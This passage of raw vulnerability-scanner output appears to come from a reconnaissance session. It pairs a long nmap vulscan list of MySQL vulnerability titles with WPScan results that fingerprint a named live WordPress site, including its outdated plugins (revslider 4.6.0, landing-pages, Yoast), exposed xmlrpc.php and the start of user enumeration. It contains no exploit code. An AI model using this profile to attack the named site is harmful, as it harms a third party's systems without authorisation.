15003| [71368] Accellion File Transfer Appliance Weak MySQL root Password
15004| [70967] MySQL Eventum Admin User Creation CSRF
15005| [70966] MySQL Eventum preferences.php full_name Parameter XSS
15006| [70961] MySQL Eventum list.php Multiple Parameter XSS
15007| [70960] MySQL Eventum forgot_password.php URI XSS
15008| [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
15009| [70610] PHP MySQLi Extension set_magic_quotes_runtime Function mysqli_fetch_assoc Function Interaction Weakness
15010| [69885] SilverStripe modules/sapphire/trunk/core/model/MySQLDatabase.php showqueries Parameter SQL Command Disclosure
15011| [69395] MySQL Derived Table Grouping DoS
15012| [69394] MySQL Temporary Table Expression Re-Evaluation DoS
15013| [69393] MySQL GROUP_CONCAT() WITH ROLLUP Modifier DoS
15014| [69392] MySQL Extreme-Value Functions Mixed Arguments DoS
15015| [69391] MySQL Stored Procedures / Prepared Statements Nested Joins DoS
15016| [69390] MySQL Extreme-Value Functions Argument Parsing Type Error DoS
15017| [69389] MySQL CONVERT_TZ() Function Empty SET Column DoS
15018| [69388] MySQL InnoDB Storage Engine Table Handling Overflow
15019| [69387] MySQL LIKE Predicates Pre-Evaluation DoS
15020| [69001] MySQL PolyFromWKB() Function WKB Data Remote DoS
15021| [69000] MySQL HANDLER Interface Unspecified READ Request DoS
15022| [68997] MySQL Prepared-Statement Mode EXPLAIN DoS
15023| [68996] MySQL EXPLAIN EXTENDED Statement DoS
15024| [68995] MySQL GeometryCollection non-Geometry Value Assignment DoS
15025| [67488] phpMyAdmin libraries/dbi/mysqli.dbi.lib.php Unspecified Parameter XSS
15026| [67487] phpMyAdmin libraries/dbi/mysql.dbi.lib.php Unspecified Parameter XSS
15027| [67421] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read Function Overflow
15028| [67420] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_ok_read Function Arbitrary Memory Content Disclosure
15029| [67419] PHP Mysqlnd Extension php_mysqlnd_read_error_from_line Function Negative Buffer Length Value Overflow
15030| [67418] PHP Mysqlnd Extension php_mysqlnd_auth_write Function Multiple Overflows
15031| [67384] MySQL LOAD DATA INFILE Statement Incorrect OK Packet DoS
15032| [67383] MySQL EXPLAIN Statement Item_singlerow_subselect::store Function NULL Dereference DoS
15033| [67381] MySQL InnoDB Temporary Table Handling DoS
15034| [67380] MySQL BINLOG Statement Unspecified Argument DoS
15035| [67379] MySQL Multiple Operation NULL Argument Handling DoS
15036| [67378] MySQL Unique SET Column Join Statement Remote DoS
15037| [67377] MySQL DDL Statement Multiple Configuration Parameter DoS
15038| [66800] PHP Multiple mysqlnd_* Function Unspecified Overflow
15039| [66799] PHP mysqlnd Error Packet Handling Multiple Overflows
15040| [66731] PHP Bundled MySQL Library Unspecified Issue
15041| [66665] PHP MySQL LOAD DATA LOCAL open_basedir Bypass
15042| [65851] MySQL ALTER DATABASE #mysql50# Prefix Handling DoS
15043| [65450] phpGraphy mysql_cleanup.php include_path Parameter Remote File Inclusion
15044| [65085] MySQL Enterprise Monitor Unspecified CSRF
15045| [64843] MySQL DROP TABLE Command Symlink MyISAM Table Local Data Deletion
15046| [64588] MySQL sql/net_serv.cc my_net_skip_rest Function Large Packet Handling Remote DoS
15047| [64587] MySQL COM_FIELD_LIST Command Packet Table Name Argument Overflow
15048| [64586] MySQL COM_FIELD_LIST Command Packet Authentication Bypass
15049| [64524] Advanced Poll misc/get_admin.php mysql_host Parameter XSS
15050| [64447] Tirzen Framework (TZN) tzn_mysql.php Username Parameter SQL Injection Authentication Bypass
15051| [64320] ClanSphere MySQL Driver s_email Parameter SQL Injection
15052| [63903] MySQL sql/sql_plugin.cc mysql_uninstall_plugin Function UNINSTALL PLUGIN Command Privilege Check Weakness
15053| [63115] Quicksilver Forums mysqldump Process List Database Password Disclosure
15054| [62830] Employee Timeclock Software mysqldump Command-line Database Password Disclosure
15055| [62640] PHP mysqli_real_escape_string() Function Error Message Path Disclosure
15056| [62216] Flex MySQL Connector ActionScript SQL Query Arbitrary Code Execution
15057| [61752] kiddog_mysqldumper Extension for TYPO3 Unspecified Information Disclosure
15058| [61497] microTopic admin/mysql.php rating Parameter SQL Injection
15059| [60665] MySQL CREATE TABLE MyISAM Table mysql_unpacked_real_data_home Local Restriction Bypass
15060| [60664] MySQL sql/sql_table.cc Data Home Directory Symlink CREATE TABLE Access Restriction Bypass
15061| [60516] RADIO istek scripti estafresgaftesantusyan.inc Direct Request MySQL Database Credentials Disclosure
15062| [60489] MySQL GeomFromWKB() Function First Argument Geometry Value Handling DoS
15063| [60488] MySQL SELECT Statement WHERE Clause Sub-query DoS
15064| [60487] MySQL vio_verify_callback() Function Crafted Certificate MiTM Weakness
15065| [60356] MySql Client Library (libmysqlclient) mysql_real_connect Function Local Overflow
15066| [59907] MySQL on Windows bind-address Remote Connection Weakness
15067| [59906] MySQL on Windows Default Configuration Logging Weakness
15068| [59616] MySQL Hashed Password Weakness
15069| [59609] Suckbot mod_mysql_logger Shared Object Unspecified Remote DoS
15070| [59495] Cyrus SASL LDAP / MySQL Authentication Patch password Field SQL Injection Authentication Bypass
15071| [59062] phpMyAdmin Extension for TYPO3 MySQL Table Name Unspecified XSS
15072| [59045] phpMyAdmin Crafted MYSQL Table Name XSS
15073| [59030] mysql-ocaml for MySQL mysql_real_escape_string() Function Character Escaping Weakness
15074| [57587] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Local Privilege Escalation
15075| [57586] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Remote Shell Command Execution
15076| [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection
15077| [56134] Virtualmin MySQL Module Execute SQL Feature Arbitrary File Access
15078| [55734] MySQL sql_parse.cc dispatch_command() Function Format String DoS
15079| [55566] MySQL Connector/NET SSL Certificate Verification Weakness
15080| [53525] MyBlog /config/mysqlconnection.inc Direct Request Information Disclosure
15081| [53524] blog+ includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15082| [53523] blog+ includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
15083| [53522] blog+ includes/block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
15084| [53521] blog+ includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
15085| [53520] blog+ includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
15086| [53519] blog+ includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15087| [53366] GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS
15088| [53365] GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS
15089| [53364] GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS
15090| [53360] Blogplus includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15091| [53359] Blogplus includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15092| [53358] Blogplus includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
15093| [53357] Blogplus includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
15094| [53356] Blogplus block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
15095| [53355] Blogplus includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
15096| [53110] XOOPS Cube Legacy ErrorHandler::show() Function MySQL Error Message XSS
15097| [52729] Asterisk-addon cdr_addon_mysql.c Call Detail Record SQL Injection
15098| [52728] Tribox cdr_addon_mysql.c Call Detail Record XSS
15099| [52727] FreePBX cdr_addon_mysql.c Call Detail Record XSS
15100| [52726] Areski cdr_addon_mysql.c Call Detail Record XSS
15101| [52464] MySQL charset Column Truncation Weakness
15102| [52453] MySQL sql/item_xmlfunc.cc ExtractValue() / UpdateXML() Functions Scalar XPath DoS
15103| [52378] Cisco ANM MySQL root Account Default Password
15104| [52264] Broadcast Machine MySQLController.php controllers/baseDir Parameter Remote File Inclusion
15105| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
15106| [51171] MySQL InnoDB convert_search_mode_to_innobase Function DoS
15107| [50892] MySQL Calendar index.php username Parameter SQL Injection
15108| [50827] Nodstrum MySQL Calendar nodstrumCalendarV2 Cookie Manipulation Admin Authentication Bypass
15109| [49875] PromoteWeb MySQL go.php id Parameter SQL Injection
15110| [48710] MySQL Command Line Client HTML Output XSS
15111| [48709] MySQL Quick Admin actions.php lang Parameter Traversal Local File Inclusion
15112| [48708] MySQL Quick Admin index.php language Cookie Traversal Local File Inclusion
15113| [48021] MySQL Empty Bit-String Literal Token SQL Statement DoS
15114| [47789] mysql-lists Unspecified XSS
15115| [47394] Keld PHP-MySQL News Script login.php username Parameter SQL Injection
15116| [45073] MySQLDumper Extension for TYPO3 Unspecified Authentication Bypass
15117| [44937] MySQL MyISAM Table CREATE TABLE Privilege Check Bypass
15118| [44138] Debian GNU/Linux libdspam7-drv-mysql Cron MySQL dspam Database Password Local Disclosure
15119| [44071] Phorum /include/db/mysql.php Unspecified Search SQL Injection
15120| [43180] MySQL sql_select.cc INFORMATION_SCHEMA Table Crafted Query Remote DoS
15121| [43179] MySQL Server BINLOG Statement Rights Checking Failure
15122| [42610] MySQL DEFINER View Value Crafted Statements Remote Privilege Escalation
15123| [42609] MySQL Federated Engine SHOW TABLE STATUS Query Remote DoS
15124| [42608] MySQL RENAME TABLE Symlink System Table Overwrite
15125| [42607] MySQL Multiple table-level DIRECTORY Remote Privilege Escalation
15126| [42460] MySQLDumper HTTP POST Request Remote Authentication Bypass
15127| [42423] AdventNet EventLog Analyzer MySQL Installation Default root Account
15128| [41861] Bacula make_catalog_backup Function MySQL Director Password Cleartext Disclosure
15129| [40232] PHP MySQL Banner Exchange inc/lib.inc Direct Request Database Disclosure
15130| [40188] Password Manager Pro (PMP) mysql Unspecified Remote Command Injection
15131| [39279] PHP mysql_error() Function XSS
15132| [39145] aurora framework db_mysql.lib pack_var() value Parameter SQL Injection
15133| [38567] NetClassifieds Mysql_db.php Halt_On_Error Setting Error Message Path Disclosure
15134| [38112] Excel Parser Pro sample/xls2mysql parser_path Parameter Remote File Inclusion
15135| [37880] Asterisk-Addons source/destination Numbers cdr_addon_mysql Module SQL Injection
15136| [37784] PHP MySQL Extension Multiple Function Security Restriction Bypass
15137| [37783] MySQL Community Server CREATE TABLE LIKE Table Structure Disclosure
15138| [37782] MySQL Community Server External Table View Privilege Escalation
15139| [37781] MySQL ALTER TABLE Information Disclosure
15140| [37539] GPL PHP Board db.mysql.inc.php root_path Parameter Remote File Inclusion
15141| [37195] Eve-Nuke Module for PHP-Nuke db/mysql.php phpbb_root_path
15142| [37015] paBugs class.mysql.php path_to_bt_dir Parameter Remote File Inclusion
15143| [36868] PHP MySQLi Extension LOCAL INFILE Operation Security Restriction Bypass
15144| [36867] PHP MySQL Extension LOCAL INFILE Operation Security Restriction Bypass
15145| [36771] InterWorx-CP SiteWorx mysql.php PATH_INFO Parameter XSS
15146| [36757] InterWorx-CP NodeWorx mysql.php PATH_INFO Parameter XSS
15147| [36732] MySQL Community Server Connection Protocol Malformed Password Packet Remote DoS
15148| [36251] Associated Press (AP) Newspower Default MySQL root Password
15149| [35168] Study Planner (Studiewijzer) db/mysql/db.inc.php SPL_CFG[dirroot] Parameter Remote File Inclusion
15150| [35037] Fantastico for cPanel includes/mysqlconfig.php fantasticopath Parameter Traversal Local File Inclusion
15151| [34780] Backup Manager Command Line Cleartext MySQL Password Disclosure
15152| [34766] MySQL RENAME TABLE Statement Arbitrary Table Name Modification
15153| [34765] MySQL mysql_change_db Function THD::db_access Privilege Escalation
15154| [34734] MySQL Crafted IF Clause Divide-by-zero NULL Dereference DoS
15155| [34038] MySQL Commander ressourcen/dbopen.php home Parameter Remote File Inclusion
15156| [33974] MySQL information_schema Table Subselect Single-Row DoS
15157| [33678] MySQLNewsEngine affichearticles.php3 newsenginedir Parameter Remote File Inclusion
15158| [33447] WGS-PPC (PPC Search Engine) config/mysql_config.php INC Parameter Remote File Inclusion
15159| [33372] deV!L'z Clanportal inc/filebrowser/browser.php MySQL Data Disclosure
15160| [33147] ActiveCalendar data/mysqlevents.php css Parameter XSS
15161| [32784] Storystream mysqli.php baseDir Parameter Remote File Inclusion
15162| [32783] Storystream mysql.php baseDir Parameter Remote File Inclusion
15163| [32421] Contenido CMS conlib/db_mysqli.inc Direct Request Path Disclosure
15164| [32272] JevonCMS /phplib/db_mysql.inc Direct Request Path Disclosure
15165| [32171] Blue Magic Board db_mysql_error.php Direct Request Path Disclosure
15166| [32056] BTSaveMySql Direct Request Config File Disclosure
15167| [32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS
15168| [32024] TikiWiki tiki-wiki_rss.php ver MySQL Credential Disclosure
15169| [31963] Agora MysqlfinderAdmin.php _SESSION[PATH_COMPOSANT] Parameter Remote File Inclusion
15170| [31431] ZoomStats libs/dbmax/mysql.php GLOBALS[lib][db][path] Parameter Remote File Inclusion
15171| [30172] TikiWiki Multiple Script Empty sort_mode Parameter MySQL Authentication Credential Disclosure
15172| [29696] MySQLDumper sql.php db Parameter XSS
15173| [29453] ConPresso CMS db_mysql.inc.php msg Parameter XSS
15174| [29122] cPanel mysqladmin/hooksadmin Unspecified Privilege Escalation
15175| [28296] MySQL Crafted multiupdate / subselects Query Local DoS
15176| [28288] MySQL Instance_options::complete_initialization Function Overflow
15177| [28030] Tutti Nova class.novaRead.mysql.php TNLIB_DIR Parameter Remote File Inclusion
15178| [28029] Tutti Nova class.novaAdmin.mysql.php TNLIB_DIR Parameter Remote File Inclusion
15179| [28028] Tutti Nova class.novaEdit.mysql.php TNLIB_DIR Parameter Remote File Inclusion
15180| [28013] MySQL SUID Routine Miscalculation Arbitrary DML Statement Execution
15181| [28012] MySQL Case Sensitivity Unauthorized Database Creation
15182| [27919] MySQL VIEW Access information_schema.views Information Disclosure
15183| [27703] MySQL MERGE Table Privilege Persistence
15184| [27593] Drupal database.mysqli.inc Multiple Parameter SQL Injection
15185| [27549] Opsware NAS /etc/init.d/mysqll MySQL root Cleartext Password Local Disclosure
15186| [27416] MySQL Server time.cc date_format Function Format String
15187| [27054] MySQL mysqld str_to_date Function NULL Argument DoS
15188| [26923] PHP/MySQL Classifieds (PHP Classifieds) search.php rate Parameter SQL Injection
15189| [26922] PHP/MySQL Classifieds (PHP Classifieds) AddAsset1.php Multiple Field XSS
15190| [26822] Bee-hive Lite include/listall.inc.php mysqlcall Parameter Remote File Inclusion
15191| [26821] Bee-hive Lite conad/include/mysqlCall.inc.php config Parameter Remote File Inclusion
15192| [26820] Bee-hive Lite conad/logout.inc.php mysqlCall Parameter Remote File Inclusion
15193| [26819] Bee-hive Lite conad/login.inc.php mysqlCall Parameter Remote File Inclusion
15194| [26818] Bee-hive Lite conad/checkPasswd.inc.php mysqlCall Parameter Remote File Inclusion
15195| [26817] Bee-hive Lite conad/changeUserDetails.inc.php mysqlCall Parameter Remote File Inclusion
15196| [26816] Bee-hive Lite conad/changeEmail.inc.php mysqlCall Parameter Remote File Inclusion
15197| [26125] Open Searchable Image Catalogue core.php do_mysql_query Function Error Message XSS
15198| [26123] Open Searchable Image Catalogue core.php do_mysql_query Function SQL Injection
15199| [25987] MySQL Multibyte Encoding SQL Injection Filter Bypass
15200| [25908] Drupal database.mysql.inc Multiple Parameter SQL Injection
15201| [25595] Apple Mac OS X MySQL Manager Blank root Password
15202| [25228] MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure
15203| [25227] MySQL COM_TABLE_DUMP Packet Overflow
15204| [25226] MySQL Malformed Login Packet Remote Memory Disclosure
15205| [24245] Cholod Mysql Based Message Board Unspecified XSS
15206| [24244] Cholod Mysql Based Message Board mb.cgi showmessage Action SQL Injection
15207| [23963] WoltLab Burning Board class_db_mysql.php SQL Error Message XSS
15208| [23915] Netcool/NeuSecure MySQL Database Connection Restriction Bypass
15209| [23611] Aztek Forum index.php msg Variable Forced MySQL Error Information Disclosure
15210| [23526] MySQL Query NULL Charcter Logging Bypass
15211| [23157] PHP/MYSQL Timesheet changehrs.php Multiple Parameter SQL Injection
15212| [23156] PHP/MYSQL Timesheet index.php Multiple Parameter SQL Injection
15213| [22995] PAM-MySQL Authentication pam_get_item() Function Unspecified Privilege Escalation
15214| [22994] PAM-MySQL SQL Logging Facility Segfault DoS
15215| [22485] Recruitment Software admin/site.xml MySQL Authentication Credential Disclosure
15216| [22479] PHP mysqli Extension Error Message Format String
15217| [22232] PHP Pipe Variable mysql_connect() Function Overflow
15218| [21685] MySQL Auction Search Module keyword XSS
15219| [20698] Campsite notifyendsubs Cron MySQL Password Cleartext Remote Disclosure
15220| [20145] Proofpoint Protection Server Embedded MySQL Server Unpassworded root Account
15221| [19457] aMember Pro mysql.inc.php Remote File Inclusion
15222| [19377] MAXdev MD-Pro /MySQL_Tools/admin.php Path Disclosure
15223| [18899] MySQL UDF Library Arbitrary Function Load Privilege Escalation
15224| [18898] MySQL UDF LoadLibraryEx Function Nonexistent Library Load DoS
15225| [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation
15226| [18896] MySQL User-Defined Function init_syms() Function Overflow
15227| [18895] MySQL libmysqlclient.so host Parameter Remote Overflow
15228| [18894] MySQL drop database Request Remote Overflow
15229| [18622] FunkBoard mysql_install.php Email Field Arbitrary PHP Code Injection
15230| [18620] FunkBoard mysql_install.php Admin/Database Password Manipulation
15231| [18406] MySQL Eventum releases.php SQL Injection
15232| [18405] MySQL Eventum custom_fields_graph.php SQL Injection
15233| [18404] MySQL Eventum custom_fields.php SQL Injection
15234| [18403] MySQL Eventum login.php email Parameter SQL Injection Authentication Bypass
15235| [18402] MySQL Eventum get_jsrs_data.php F Parameter XSS
15236| [18401] MySQL Eventum list.php release Parameter XSS
15237| [18400] MySQL Eventum view.php id Parameter XSS
15238| [18173] MySQL on Windows USE Command MS-DOS Device Name DoS
15239| [17801] Bugzilla MySQL Replication Race Condition Information Disclosure
15240| [17223] xMySQLadmin Symlink Arbitrary File Deletion
15241| [16727] MySQL Nonexistent '--user' Error Incorrect Privilege Database Invocation
15242| [16689] MySQL mysql_install_db Symlink Arbitrary File Overwrite
15243| [16056] Plans Unspecified mySQL Remote Password Disclosure
15244| [15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow
15245| [15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow
15246| [15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow
15247| [15451] paNews auth.php mysql_prefix Parameter SQL Injection
15248| [14748] MySQL MS-DOS Device Names Request DoS
15249| [14678] MySQL CREATE FUNCTION Arbitrary libc Code Execution
15250| [14677] MySQL CREATE FUNCTION mysql.func Table Arbitrary Library Injection
15251| [14676] MySQL CREATE TEMPORARY TABLE Symlink Privilege Escalation
15252| [14386] phpMyAdmin mysqli.dbi.lib.php Path Disclosure
15253| [14052] Symantec Brightmail AntiSpam Multiple Default MySQL Accounts
15254| [13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS
15255| [13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS
15256| [13013] MySQL mysqlaccess.sh Symlink Arbitrary File Manipulation
15257| [12919] MySQL MaxDB WebAgent websql Remote Overflow
15258| [12779] MySQL User Defined Function Privilege Escalation
15259| [12609] MySQL Eventum projects.php Multiple Parameter XSS
15260| [12608] MySQL Eventum preferences.php Multiple Parameter XSS
15261| [12607] MySQL Eventum forgot_password.php email Parameter XSS
15262| [12606] MySQL Eventum index.php email Parameter XSS
15263| [12605] MySQL Eventum Default Vendor Account
15264| [12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS
15265| [12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow
15266| [11689] Roxen Web Server MySQL Socket Permission Weakness
15267| [10985] MySQL MATCH..AGAINST Query DoS
15268| [10959] MySQL GRANT ALL ON Privilege Escalation
15269| [10660] MySQL ALTER TABLE/RENAME Forces Old Permission Checks
15270| [10659] MySQL ALTER MERGE Tables to Change the UNION DoS
15271| [10658] MySQL mysql_real_connect() Function Remote Overflow
15272| [10532] MySQL MaxDB webdbm Server Field DoS
15273| [10491] AWS MySQLguest AWSguest.php Script Insertion
15274| [10244] MySQL libmysqlclient Prepared Statements API Overflow
15275| [10226] MySQLGuest AWSguest.php Multiple Field XSS
15276| [9912] PHP safe_mode MySQL Database Access Restriction Bypass
15277| [9911] Inter7 vpopmail MySQL Module Authentication Credential Disclosure
15278| [9910] MySQL mysql_change_user() Double-free Memory Pointer DoS
15279| [9909] MySQL datadir/my.cnf Modification Privilege Escalation
15280| [9908] MySQL my.ini Initialization File datadir Parameter Overflow
15281| [9907] MySQL SELECT Statement String Handling Overflow
15282| [9906] MySQL GRANT Privilege Arbitrary Password Modification
15283| [9509] teapop MySQL Authentication Module SQL Injection
15284| [9018] MySQL Backup Pro getbackup() Method Unspecified Issue
15285| [9015] MySQL mysqlhotcopy Insecure Temporary File Creation
15286| [8997] Cacti config.php MySQL Authentication Credential Cleartext Disclosure
15287| [8979] MySQL SHOW GRANTS Encrypted Password Disclosure
15288| [8889] MySQL COM_TABLE_DUMP Package Negative Integer DoS
15289| [8888] MySQL COM_CHANGE_USER Command Long Repsonse Overflow
15290| [8887] MySQL COM_CHANGE_USER Command One Character Password Brute Force
15291| [8886] MySQL libmysqlclient Library read_one_row Overflow
15292| [8885] MySQL libmysqlclient Library read_rows Overflow
15293| [7476] MySQL Protocol 4.1 Authentication Scramble String Overflow
15294| [7475] MySQL Zero-length Scrambled String Crafted Packet Authentication Bypass
15295| [7245] MySQL Pluggable Authentication Module (pam_mysql) Password Disclosure
15296| [7128] MySQL show database Database Name Exposure
15297| [6716] MySQL Database Engine Weak Authentication Information Disclosure
15298| [6605] MySQL mysqld Readable Log File Information Disclosure
15299| [6443] PowerPhlogger db_dump.php View Arbitrary mySQL Dump
15300| [6421] MySQL mysqld_multi Symlink Arbitrary File Overwrite
15301| [6420] MySQL mysqlbug Symlink Arbitrary File Overwrite
15302| [2537] MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
15303| [2144] WinMySQLadmin my.ini Cleartext Password Disclosure
15304| [653] PCCS-Linux MySQL Database Admin Tool Authentication Credential Disclosure
15305| [520] MySQL Database Name Traversal Arbitrary File Modification
15306| [380] MySQL Server on Windows Default Null Root Password
15307| [261] MySQL Short Check String Authentication Bypass
15308|_
153098443/tcp open ssl/http sw-cp-server httpd (Plesk Onyx 17.8.11)
15310|_http-server-header: sw-cp-server
15311| vulscan: VulDB - https://vuldb.com:
15312| No findings
15313|
15314| MITRE CVE - https://cve.mitre.org:
15315| No findings
15316|
15317| SecurityFocus - https://www.securityfocus.com/bid/:
15318| No findings
15319|
15320| IBM X-Force - https://exchange.xforce.ibmcloud.com:
15321| No findings
15322|
15323| Exploit-DB - https://www.exploit-db.com:
15324| No findings
15325|
15326| OpenVAS (Nessus) - http://www.openvas.org:
15327| No findings
15328|
15329| SecurityTracker - https://www.securitytracker.com:
15330| No findings
15331|
15332| OSVDB - http://www.osvdb.org:
15333| No findings
15334###################################################################################################################################
15335[+] URL: http://www.cazahispanica.com/
15336[+] Started: Sun Jan 5 03:08:46 2020
15337
15338Interesting Finding(s):
15339
15340[+] http://www.cazahispanica.com/
15341 | Interesting Entries:
15342 | - Server: Apache
15343 | - X-Powered-By: PHP/5.6.40, PleskLin
15344 | Found By: Headers (Passive Detection)
15345 | Confidence: 100%
15346
15347[+] http://www.cazahispanica.com/robots.txt
15348 | Interesting Entries:
15349 | - /wp-admin/
15350 | - /wp-admin/admin-ajax.php
15351 | Found By: Robots Txt (Aggressive Detection)
15352 | Confidence: 100%
15353
15354[+] http://www.cazahispanica.com/xmlrpc.php
15355 | Found By: Link Tag (Passive Detection)
15356 | Confidence: 100%
15357 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
15358 | References:
15359 | - http://codex.wordpress.org/XML-RPC_Pingback_API
15360 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
15361 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
15362 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
15363 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
15364
15365[+] http://www.cazahispanica.com/readme.html
15366 | Found By: Direct Access (Aggressive Detection)
15367 | Confidence: 100%
15368
15369[+] http://www.cazahispanica.com/wp-cron.php
15370 | Found By: Direct Access (Aggressive Detection)
15371 | Confidence: 60%
15372 | References:
15373 | - https://www.iplocation.net/defend-wordpress-from-ddos
15374 | - https://github.com/wpscanteam/wpscan/issues/1299
15375
15376[+] WordPress version 4.4.21 identified (Latest, released on 2019-12-12).
15377 | Found By: Rss Generator (Passive Detection)
15378 | - http://www.cazahispanica.com/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15379 | - http://www.cazahispanica.com/comments/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15380
15381[+] WordPress theme in use: medacorp
15382 | Location: http://www.cazahispanica.com/wp-content/themes/medacorp/
15383 | Style URL: http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0
15384 | Style Name: MedaCorp
15385 | Style URI: http://medacorp.novademo.com/
15386 | Description: MedaCorp - The Ultimate WordPress Theme...
15387 | Author: Novaworks
15388 | Author URI: http://www.novaworks.net/
15389 |
15390 | Found By: Css Style In Homepage (Passive Detection)
15391 | Confirmed By: Css Style In 404 Page (Passive Detection)
15392 |
15393 | Version: 1.1.3 (80% confidence)
15394 | Found By: Style (Passive Detection)
15395 | - http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0, Match: 'Version: 1.1.3'
15396
15397[+] Enumerating All Plugins (via Passive Methods)
15398[+] Checking Plugin Versions (via Passive and Aggressive Methods)
15399
15400[i] Plugin(s) Identified:
15401
15402[+] essential-grid
15403 | Location: http://www.cazahispanica.com/wp-content/plugins/essential-grid/
15404 | Latest Version: 1.1.1
15405 | Last Updated: 2019-07-30T22:13:00.000Z
15406 |
15407 | Found By: Urls In Homepage (Passive Detection)
15408 | Confirmed By: Urls In 404 Page (Passive Detection)
15409 |
15410 | The version could not be determined.
15411
15412[+] js_composer
15413 | Location: http://www.cazahispanica.com/wp-content/plugins/js_composer/
15414 |
15415 | Found By: Urls In Homepage (Passive Detection)
15416 | Confirmed By:
15417 | Urls In 404 Page (Passive Detection)
15418 | Meta Generator (Passive Detection)
15419 | Body Tag (Passive Detection)
15420 |
15421 | Version: 4.6.1 (60% confidence)
15422 | Found By: Body Tag (Passive Detection)
15423 | - http://www.cazahispanica.com/, Match: 'js-comp-ver-4.6.1'
15424
15425[+] landing-pages
15426 | Location: http://www.cazahispanica.com/wp-content/plugins/landing-pages/
15427 | Last Updated: 2019-10-22T15:52:00.000Z
15428 | [!] The version is out of date, the latest version is 2.7.9
15429 |
15430 | Found By: Urls In Homepage (Passive Detection)
15431 | Confirmed By: Urls In 404 Page (Passive Detection)
15432 |
15433 | Version: 2.0.5 (100% confidence)
15434 | Found By: Readme - Stable Tag (Aggressive Detection)
15435 | - http://www.cazahispanica.com/wp-content/plugins/landing-pages/readme.txt
15436 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
15437 | - http://www.cazahispanica.com/wp-content/plugins/landing-pages/readme.txt
15438
15439[+] revslider
15440 | Location: http://www.cazahispanica.com/wp-content/plugins/revslider/
15441 |
15442 | Found By: Urls In Homepage (Passive Detection)
15443 | Confirmed By:
15444 | Urls In 404 Page (Passive Detection)
15445 | Comment (Passive Detection)
15446 |
15447 | Version: 4.6.0 (100% confidence)
15448 | Found By: Comment (Passive Detection)
15449 | - http://www.cazahispanica.com/, Match: 'START REVOLUTION SLIDER 4.6.0'
15450 | Confirmed By: Release Log (Aggressive Detection)
15451 | - http://www.cazahispanica.com/wp-content/plugins/revslider/release_log.html, Match: 'Version 4.6 SkyWood (25th August 2014)'
15452
15453[+] wordpress-seo
15454 | Location: http://www.cazahispanica.com/wp-content/plugins/wordpress-seo/
15455 | Last Updated: 2019-12-12T08:32:00.000Z
15456 | [!] The version is out of date, the latest version is 12.7.1
15457 |
15458 | Found By: Comment (Passive Detection)
15459 |
15460 | Version: 3.0.7 (100% confidence)
15461 | Found By: Comment (Passive Detection)
15462 | - http://www.cazahispanica.com/, Match: 'optimized with the Yoast SEO plugin v3.0.7 -'
15463 | Confirmed By:
15464 | Readme - Stable Tag (Aggressive Detection)
15465 | - http://www.cazahispanica.com/wp-content/plugins/wordpress-seo/readme.txt
15466 | Readme - ChangeLog Section (Aggressive Detection)
15467 | - http://www.cazahispanica.com/wp-content/plugins/wordpress-seo/readme.txt
15468
15469[+] Enumerating Config Backups (via Passive and Aggressive Methods)
15470 Checking Config Backups - Time: 00:00:10 <=============> (21 / 21) 100.00% Time: 00:00:10
15471
15472[i] No Config Backups Found.
15473
15474[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
15475[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
15476
15477[+] Finished: Sun Jan 5 03:09:32 2020
15478[+] Requests Done: 68
15479[+] Cached Requests: 10
15480[+] Data Sent: 16.785 KB
15481[+] Data Received: 293.96 KB
15482[+] Memory used: 176.837 MB
15483[+] Elapsed time: 00:00:46
15484###################################################################################################################################
15485[+] URL: http://www.cazahispanica.com/
15486[+] Started: Sun Jan 5 03:08:52 2020
15487
15547[+] Enumerating Users (via Passive and Aggressive Methods)
